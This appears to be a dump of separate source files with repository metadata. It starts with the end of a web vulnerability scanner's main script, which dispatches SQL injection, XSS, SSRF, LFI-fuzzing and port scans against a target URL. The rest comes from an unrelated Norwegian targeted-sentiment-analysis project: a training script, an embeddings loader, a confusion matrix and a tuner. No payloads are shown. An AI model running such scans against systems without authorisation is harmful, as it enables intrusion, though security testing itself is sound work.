parser.add_argument('--payload_num', '--payload_num',dest="payload_num", help="the num of payload you want to print. default 10(used for error,boolen,time inject)", type=int,default = 10)
parser.add_argument('-x', '--xss',dest="xss_scan", help="xss scan", type=str,default = False)
parser.add_argument('--param_file', '--param_file', dest="param_file", help="LFi fuzz param_file", type=str,default = 'directroy/123.txt')
parser.add_argument('--value_file', '--value_file', dest="value_file", help="LFi fuzz value_file", type=str,default = 'directroy/pathtotest_huge.txt')
parser.add_argument('--ssrf', '--ssrf', dest="ssrf_scan", help="whether start ssrf scan", type=str,default = False)
parser.add_argument('--redirect_file', '--redirect_file', dest="redirect_file", help="the path of 302 file if not will not try 302", type=str,default = None)
self.args = parser.parse_args()
def start(self):
try :
self.get_input()
#路径扫描
if self.args.path_scan:
time0 = time.time()
scan_path = path_scan(self.args.scan_url,self.args.coroutine_num,self.args.dictory)
scan_path.start()
time1 = time.time()
self._print.print_end(time1 - time0,'path scan')
#指纹扫描
if self.args.finger_scan:
time0 = time.time()
finger_scan = FingerScan(self.args.scan_url,self.args.sqlite_file)
finger_scan.run()
time1 = time.time()
self._print.print_end(time1 - time0,'finger scan')
#端口扫描
if self.args.port_scan:
thread = myThread(self.args.scan_url,self.args.port_scan)
thread.in_queue()
thread.scan_start()
if self.args.fuzz:
fuzz = Fuzz(self.args.scan_url,num = self.args.coroutine_num,param_file=self.args.param_file,value_file=self.args.value_file)
fuzz.start()
# ip扫描
if self.args.Ipscan:
scan = Ipscan(self.args.scan_url)
scan.ip_queue()
scan.scan_start()
if self.args.sql_scan:
if self.args.union_scan:
#self._print.start_scan("union",time0)
union_scan = ScanUnion(self.args.scan_url,self.args.sql_method,self.args.header_file)
union_scan.union_inject()
self._print.sql_stop()
if self.args.error_scan:
time0 = time.time()
self._print.start_scan("error")
error_scan = error_inject(self.args.scan_url,self.args.sql_method,self.args.header_file,payload_num=self.args.payload_num)
error_scan.start()
time1 = time.time()
self._print.print_end(time1 - time0,'SQL_Error scan')
if self.args.Boolen_scan:
time0 = time.time()
self._print.start_scan("Boolen")
Boolen_scan = Boolen_Scan(self.args.scan_url,method = self.args.sql_method,file = self.args.header_file,thread_num = self.args.thread_num,payload_num=self.args.payload_num, string=self.args.true_string, not_string=self.args.false_string)
Boolen_scan.start()
time1 = time.time()
self._print.print_end(time1 - time0,'SQL_Boolen scan')
if self.args.time_scan:
time0 = time.time()
self._print.start_scan("time")
Time = Time_scan(self.args.scan_url,method = self.args.sql_method,file = self.args.header_file,thread_num = self.args.thread_num,payload_num=self.args.payload_num,wait_time=self.args.wait_time)
Time.start()
time1 = time.time()
self._print.print_end(time1 - time0,'SQL_time scan')
if not self.args.union_scan and not self.args.error_scan and not self.args.Boolen_scan and not self.args.time_scan:
time0 = time.time()
self._print.start_scan("union")
union_scan = ScanUnion(self.args.scan_url,method = self.args.sql_method,file = self.args.header_file)
union_scan.union_inject()
self._print.start_scan("error")
error_scan = error_inject(self.args.scan_url,self.args.sql_method,self.args.header_file,payload_num=self.args.payload_num)
error_scan.start()
self._print.sql_stop()
self._print.start_scan("Boolen")
Boolen_scan = Boolen_Scan(self.args.scan_url,method = self.args.sql_method,file = self.args.header_file,thread_num = self.args.thread_num,payload_num=self.args.payload_num,string=self.args.true_string,not_string=self.args.false_string)
Boolen_scan.start()
self._print.start_scan("time")
time_scan = time_scan(self.args.scan_url,method = self.args.sql_method,file = self.args.header_file,thread_num = self.args.thread_num,payload_num=self.args.payload_num,wait_time = self.args.wait_time)
time_scan.start()
time1 = time.time()
self._print.print_end(time1 - time0,'SQL scan')
if self.args.xss_scan:
self._print.start_scan("xss")
xssScanner=xss_Scanner(self.args.scan_url,thread_num = self.args.thread_num,payload_num=self.args.payload_num)
xssScanner.run()
if self.args.ssrf_scan:
self._print.start_scan("ssrf")
if self.args.redirect_file:
time0 = time.time()
ssrfScan_ = ssrfScan(self.args.scan_url,self.args.scan_url)
ssrfScan_.FileScan()
ssrfScan_.dictScan()
ssrfScan_.redirectScan()
ssrfScan_.url_in_queue()
ssrfScan_.start()
time1 = time.time()
self._print.print_end(time1 - time0,'SSRF scan')
else:
time0 = time.time()
ssrfScan_ = ssrfScan(self.args.scan_url)
ssrfScan_.FileScan()
ssrfScan_.dictScan()
ssrfScan_.url_in_queue()
ssrfScan_.start()
time1 = time.time()
self._print.print_end(time1 - time0,'SSRF scan')
except OSError as e:
pass
def banner(self):
banner = '''
____ ____
/ ___| _ _ _ __ ___ ___ ___/ ___| ___ __ _ _ __
\___ \| | | | '_ \/ __|/ _ \/ __\___ \ / __/ _` | '_ \
___) | |_| | | | \__ \ __/ (__ ___) | (_| (_| | | | |
|____/ \__,_|_| |_|___/\___|\___|____/ \___\__,_|_| |_|
'''
print(banner)
if __name__ == "__main__":
pro = menu()
pro.banner()
pro.start()
| {"/src/Ipscan.py": ["/src/_print.py"], "/src/fuzz.py": ["/src/_print.py"], "/src/port_scan.py": ["/src/_print.py"], "/src/scan.py": ["/src/_print.py"], "/main.py": ["/src/scan.py", "/src/_print.py", "/src/fuzz.py", "/src/Ipscan.py", "/sql_injection/union.py", "/sql_injection/error_inject.py", "/sql_injection/Boolen_scan.py", "/sql_injection/time_scan.py", "/xss/xss_scan.py", "/ssrf/ssrf.py"]} |
50,704 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/metrics/__init__.py | from .confusion import ConfusionMatrix
from .functional import * | {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,705 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /scripts/baseline.py | """
Run the baseline script.
"""
import torch
from torch.utils.data import DataLoader
import numpy as np
from baseline.dataset import Vocab, ConllDataset
from baseline.word2vec import Word2Vec
from baseline.model import BiLSTM
import argparse
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--NUM_LAYERS", "-nl", default=1, type=int)
parser.add_argument("--HIDDEN_DIM", "-hd", default=100, type=int)
parser.add_argument("--BATCH_SIZE", "-bs", default=50, type=int)
parser.add_argument("--DROPOUT", "-dr", default=0.01, type=int)
parser.add_argument("--EMBEDDING_DIM", "-ed", default=100, type=int)
parser.add_argument("--EMBEDDINGS", "-emb", default="word2vec/models.txt")
parser.add_argument("--TRAIN_EMBEDDINGS", "-te", action="store_true")
parser.add_argument("--LEARNING_RATE", "-lr", default=0.01, type=int)
parser.add_argument("--EPOCHS", "-e", default=50, type=int)
args = parser.parse_args()
print(args)
# Get embeddings (CHANGE TO GLOVE OR FASTTEXT EMBEDDINGS)
embeddings = Word2Vec(args.EMBEDDINGS)
w2idx = embeddings._w2idx
# Create shared vocabulary for tasks
vocab = Vocab(train=True)
# Update with word2idx from pretrained embeddings so we don't lose them
# making sure to change them by two to avoid overwriting the PAD and UNK
# tokens at index 0 and 1
with_unk = {}
for word, idx in embeddings._w2idx.items():
with_unk[word] = idx + 2
vocab.update(with_unk)
# Import datasets
# This will update vocab with words not found in embeddings
dataset = ConllDataset(vocab)
train_iter = dataset.get_split("data/train.conll")
dev_iter = dataset.get_split("data/dev.conll")
test_iter = dataset.get_split("data/test.conll")
# Create a new embedding matrix which includes the pretrained embeddings
# as well as new embeddings for PAD UNK and tokens not found in the
# pretrained embeddings.
diff = len(vocab) - embeddings.vocab_length - 2
PAD_UNK_embeddings = np.zeros((2, args.EMBEDDING_DIM))
new_embeddings = np.zeros((diff, args.EMBEDDING_DIM))
new_matrix = np.concatenate((PAD_UNK_embeddings,
embeddings._matrix,
new_embeddings))
# Set up the data iterators for the LSTM models. The batch size for the dev
# and test loader is set to 1 for the predict() and evaluate() methods
train_loader = DataLoader(train_iter,
batch_size=args.BATCH_SIZE,
collate_fn=train_iter.collate_fn,
shuffle=True)
dev_loader = DataLoader(dev_iter,
batch_size=1,
collate_fn=dev_iter.collate_fn,
shuffle=False)
test_loader = DataLoader(test_iter,
batch_size=1,
collate_fn=test_iter.collate_fn,
shuffle=False)
# Automatically determine whether to run on CPU or GPU
device = torch.device('cpu')
model = BiLSTM(word2idx=vocab,
embedding_matrix=new_matrix,
embedding_dim=args.EMBEDDING_DIM,
hidden_dim=args.HIDDEN_DIM,
device=device,
output_dim=5,
num_layers=args.NUM_LAYERS,
word_dropout=args.DROPOUT,
learning_rate=args.LEARNING_RATE,
train_embeddings=args.TRAIN_EMBEDDINGS)
model.fit(train_loader, dev_loader, epochs=args.EPOCHS)
binary_f1, propor_f1 = model.evaluate(test_loader)
# For printing the predictions, we would prefer to see the actual labels,
# rather than the indices, so we create and index to label dictionary
# which the print_predictions method takes as input.
idx2label = {i: l for l, i in dataset.label2idx.items()}
model.print_predictions(test_loader,
outfile="predictions.conll",
idx2label=idx2label)
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,706 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/datasets/nonlpl.py | r"""
``NoNLPL`` is a dataset instance used to load pre-trained embeddings.
"""
import os
from torchtext.vocab import Vectors
from ._utils import download_from_url, extract_to_dir
class NoNLPL(Vectors):
r"""The Norwegian Bokmal NLPL dataset contains more than 1,000,000 pre-trained word embeddings from
the norwegian language.
Examples::
>>> vectors = NoNLPL.load()
"""
urls = ['http://vectors.nlpl.eu/repository/20/58.zip']
name = '58'
dirname = 'nlpl-vectors'
def __init__(self, filepath):
super().__init__(filepath)
@classmethod
def load(cls, data='model.txt', root='.vector_cache'):
r"""Load pre-trained word embeddings.
Args:
data (sting): string of the data containing the pre-trained word embeddings.
root (string): root folder where vectors are saved.
Returns:
NoNLPL: loaded dataset.
"""
path = os.path.join(root, cls.dirname, cls.name)
# Maybe download
if not os.path.isdir(path):
path = cls.download(root)
filepath = os.path.join(path, data)
return NoNLPL(filepath)
@classmethod
def download(cls, root):
r"""Download and unzip a web archive (.zip, .gz, or .tgz).
Args:
root (str): Folder to download data to.
Returns:
string: Path to extracted dataset.
"""
path_dirname = os.path.join(root, cls.dirname)
path_name = os.path.join(path_dirname, cls.name)
if not os.path.isdir(path_dirname):
for url in cls.urls:
filename = os.path.basename(url)
zpath = os.path.join(path_dirname, filename)
if not os.path.isfile(zpath):
if not os.path.exists(os.path.dirname(zpath)):
os.makedirs(os.path.dirname(zpath))
print(f'Download {filename} from {url} to {zpath}')
download_from_url(url, zpath)
extract_to_dir(zpath, path_name)
return path_name
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,707 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/metrics/confusion.py | r"""
Defines a ```ConfusionMatrix```, used to compute scores (True Positive, False Negative etc.).
.. image:: images/confusion_matrix.png
Example:
.. code-block:: python
# Create a confusion matrix
confusion = ConfusionMatrix(num_classes=10)
# Update the confusion matrix with a list of predictions and labels
confusion.update(gold_labels, predictions)
# Get the global accuracy, precision, scores from attributes or methods
confusion.accuracy()
"""
import pandas as pd
from sklearn.metrics import precision_score, accuracy_score, f1_score, recall_score
from .functional import *
try:
import seaborn as sns
except ModuleNotFoundError:
print('WARNING: Seaborn is not installed. Plotting confusion matrices is unavailable.')
class ConfusionMatrix:
r"""A ```ConfusionMatrix``` is a matrix of shape :math:`(C, C)`, used to index predictions :math:`p \in C`
regarding their gold labels (or truth labels).
"""
def __init__(self, labels=None, data=None, names=None, axis_label=0, axis_pred=1):
assert labels is not None or data is not None, 'Failed to initialize a confusion matrix. Please provide ' \
'the number of classes `num_classes` or a starting ' \
'data `data`.'
# General attributes
self.num_classes = len(labels) if labels is not None else len(data)
self.matrix = np.zeros((self.num_classes, self.num_classes)) if data is None else np.array(data)
self.labels = list(range(self.num_classes)) if labels is None else labels
self.names = names
# map from labels indices to confusion matrix's indices
self.label2idx = {label: i for (label, i) in zip(self.labels, np.arange(self.num_classes))}
self.idx2label = {i: label for (label, i) in zip(self.labels, np.arange(self.num_classes))}
self.predictions, self.gold_labels = ([], []) \
if data is None else self.flatten(axis_label=axis_label, axis_pred=axis_pred, map=self.idx2label)
def _init_labels(self, num_classes, ignore_index):
labels = list(range((num_classes)))
if isinstance(ignore_index, list):
for idx in ignore_index:
labels.pop(idx)
return labels
@property
def tp(self):
return true_positive(self.matrix)
@property
def tn(self):
return true_negative(self.matrix)
@property
def fp(self):
return false_positive(self.matrix)
@property
def fn(self):
return false_negative(self.matrix)
@property
def tpr(self):
return true_positive_rate(self.matrix)
@property
def tnr(self):
return true_negative_rate(self.matrix)
@property
def ppv(self):
return positive_predictive_value(self.matrix)
@property
def npv(self):
return negative_predictive_value(self.matrix)
@property
def fpr(self):
return false_positive_rate(self.matrix)
@property
def fnr(self):
return false_negative_rate(self.matrix)
@property
def fdr(self):
return false_discovery_rate(self.matrix)
@property
def acc(self):
return np.diag(self.matrix) / self.matrix.sum()
def precision_score(self, average='macro', zero_division=0, **kwargs):
return precision_score(self.gold_labels, self.predictions, average=average, **kwargs)
def recall_score(self, average='macro', zero_division=0, **kwargs):
return recall_score(self.gold_labels, self.predictions, average=average, **kwargs)
def f1_score(self, average='macro', zero_division=0, **kwargs):
return f1_score(self.gold_labels, self.predictions, average=average, **kwargs)
def accuracy_score(self, **kwargs):
return accuracy_score(self.gold_labels, self.predictions, **kwargs)
def update(self, gold_labels, predictions):
r"""Update the confusion matrix from a list of predictions, with their respective gold labels.
Args:
gold_labels (list): a list of predictions.
predictions (list): respective gold labels (or truth labels)
"""
# Make sure the inputs are 1D arrays
gold_labels = np.array(gold_labels).reshape(-1)
predictions = np.array(predictions).reshape(-1)
self.gold_labels.extend(gold_labels)
self.predictions.extend(predictions)
# Complete the confusion matrix
for i, p in enumerate(predictions):
# Ignore unknown predictions / labels / pad index etc.
if gold_labels[i] in self.labels and predictions[i] in self.labels:
actual = self.label2idx[gold_labels[i]]
pred = self.label2idx[predictions[i]]
self.matrix[actual, pred] += 1
def to_dataframe(self, names=None, normalize=False):
r"""Convert the ``ConfusionMatrix`` to a `DataFrame`.
Args:
names (list): list containing the ordered names of the indices used as gold labels.
normalize (bool): if ``True``, normalize the ``matrix``.
Returns:
pandas.DataFrame
"""
names = names or self.names
matrix = self.normalize() if normalize else self.matrix
return pd.DataFrame(matrix, index=names, columns=names)
def to_dict(self):
r"""Convert the ``ConfusionMatrix`` to a `dict`.
* :attr:`global accuracy` (float): accuracy obtained on all classes.
* :attr:`sensitivity` (float): sensitivity obtained on all classes.
* :attr:`precision` (float): precision obtained on all classes.
* :attr:`specificity` (float): specificity obtained on all classes.
* :attr:`confusion` (list): confusion matrix obtained on all classes.
Returns:
dict
"""
return {'score': float(self.accuracy_score()),
'precision': float(self.precision_score()),
'recall': float(self.recall_score()),
'f1_score': float(self.f1_score()),
'confusion': self.matrix.tolist()}
def normalize(self):
r"""Nomalize the confusion ``matrix``.
.. math::
\text{Norm}(Confusion) = \frac{Confusion}{sum(Confusion)}
.. note::
The operation is not inplace, and thus does not modify the attribute ```matrix```.
Returns:
numpy.ndarray: normalized confusion matrix.
"""
top = self.matrix
bottom = self.matrix.sum(axis=1)[:, np.newaxis]
return np.divide(top, bottom, out=np.zeros_like(top), where=bottom != 0)
def zeros(self):
r"""Zeros the ```matrix```. Can be used to empty memory without removing the object.
Returns:
None. Inplace operation.
"""
self.matrix = np.zeros_like(self.matrix)
def flatten(self, *args, **kwargs):
r"""Flatten a confusion matrix to retrieve its prediction and gold labels.
"""
return flatten_matrix(self.matrix, *args, **kwargs)
def plot(self, names=None, normalize=False, cmap='Blues', cbar=True, **kwargs):
r"""Plot the ``matrix`` in a new figure.
.. warning::
`plot` is compatible with matplotlib 3.1.1.
If you are using an older version, the display may change (version < 3.0).
Args:
names (list): list of ordered names corresponding to the indices used as gold labels.
normalize (bool): if ``True`` normalize the ``matrix``.
cmap (string or matplotlib.pyplot.cmap): heat map colors.
cbar (bool): if ``True``, display the colorbar associated to the heat map plot.
Returns:
matplotlib.Axes: axes corresponding to the plot.
"""
# Convert the matrix in dataframe to be compatible with Seaborn
df = self.to_dataframe(names=names, normalize=normalize)
# Plot a heat map
ax = sns.heatmap(df, annot=True, cmap=cmap, cbar=cbar, **kwargs)
# Correct some bugs in the latest matplotlib version (3.1.1)
bottom, top = ax.get_ylim()
ax.set_ylim(bottom + 0.5, top - 0.5)
# Display correctly the labels
ax.set_yticklabels(rotation=0, labels=names)
ax.set_ylabel("Actual")
ax.set_xticklabels(rotation=90, labels=names)
ax.set_xlabel("Predicted")
return ax
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,708 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/process.py | r"""
Pre-process the data.
"""
import torchtext
from sentarget.datasets import NoReCfine
class Process:
r"""
"""
def __init__(self, train_data, eval_data, test_data, fields=None):
self.train_data, self.eval_data, self.test_data = train_data, eval_data, test_data
self.fields = fields
@classmethod
def load(cls, fields=None):
r"""Load the data.
Args:
fields:
Returns:
"""
text = torchtext.data.Field(lower=True, include_lengths=True, batch_first=True)
label = torchtext.data.Field(batch_first=True)
fields = fields if fields is not None else [("text", text), ("label", label)]
train_data, eval_data, test_data = NoReCfine.splits(fields)
return Process(train_data, eval_data, test_data, fields=fields)
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,709 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/utils/__init__.py | from .decorator import deprecated
from .display import *
from .functions import *
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,710 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/tuner/tuner.py | r"""
Hyperparameters optimization using a grid search algorithm.
Basically, you need to provide a set of parameters that will be modified.
The grid search will run on all permutations from the set of parameters provided.
Usually, you modify the hyperparameters and models' modules (ex, dropout etc.).
In addition, if you are using custom losses or optimizer that needs additional arguments / parameters,
you can provide them through the specific dictionaries (see the documentation of ``Tuner``).
Examples:
.. code-block:: python
# Hyper parameters to tune
params_hyper = {
'epochs': [150],
'lr': np.arange(0.001, 0.3, 0.01).tolist(), # Make sure to convert it to a list (for saving after)
}
# Parameters affecting the models
params_model = {
'model': [BiLSTM]
'hidden_dim': [100, 150, 200, 250], # Model attribute
'n_layers': [1, 2, 3], # Model attribute
'bidirectional': [False, True], # Model attribute
'LSTM.dropout': [0.2, 0.3, 0.4, 0.6], # Modify all LSTM dropout
# ...
}
params_loss = {
'criterion': [CrossEntropyLoss]
}
params_optim = {
'criterion': [Adam]
}
tuner = Tuner(params_hyper, params_loss=params_loss, params_optim=params_optim)
# Grid Search
tuner.fit(train_iterator, eval_iterator, verbose=True)
"""
import copy
import json
import os
from pathlib import Path
import torch
from sentarget.nn.models import BiLSTM
from .functional import tune, tune_optimizer, init_cls
from sentarget.utils import describe_dict, serialize_dict, permutation_dict
class Tuner:
r"""
The ``Tuner`` class is used for hyper parameters tuning.
From a set of models and parameters to tune, this class will look at the best model's performance.
.. note::
To facilitate the search and hyperameters tuning, it is recommended to use the
``sentarget.nn.models.Model`` abstract class as parent class for all of your models.
* :attr:`hyper_params` (dict): dictionary of hyperparameters to tune.
* :attr:`params_model` (dict): dictionary of model's parameters to tune.
* :attr:`params_loss` (dict): dictionary of loss's parameters to tune.
* :attr:`params_optim` (dict): dictionary of optimizer's parameters to tune.
* :attr:`options` (dict): dictionary of general options.
* :attr:`performance` (dict): dictionary of all models' performances.
"""
def __init__(self, params_hyper=None, params_model=None, params_loss=None, params_optim=None,
options=None):
# Hyper parameters with default values
self.params_hyper = params_hyper if params_model is not None else {}
self.params_model = params_model if params_model is not None else {}
self.params_loss = params_loss if params_loss is not None else {}
self.params_optim = params_optim if params_optim is not None else {}
# General options
self.options = {**self._init_options(), **options} if options is not None else self._init_options()
# Keep track of all performances
self.results = []
self._log = None
self._log_conf = None
self._log_perf = None
self.best_model = None
def _init_options(self):
options = {
'saves': True,
'dirsaves': '.saves',
'compare_on': 'accuracy',
'verbose': True,
}
return options
def _init_hyper(self):
params_hyper = {
'batch_size': 64,
'epochs': 100
}
return params_hyper
def reset(self):
r"""Reset all parameters to their default values."""
self.results = []
self._log = None
self._log_conf = None
self._log_perf = None
self.best_model = None
def fit(self, train_data, eval_data, **kwargs):
r"""Run the hyper parameters tuning.
Args:
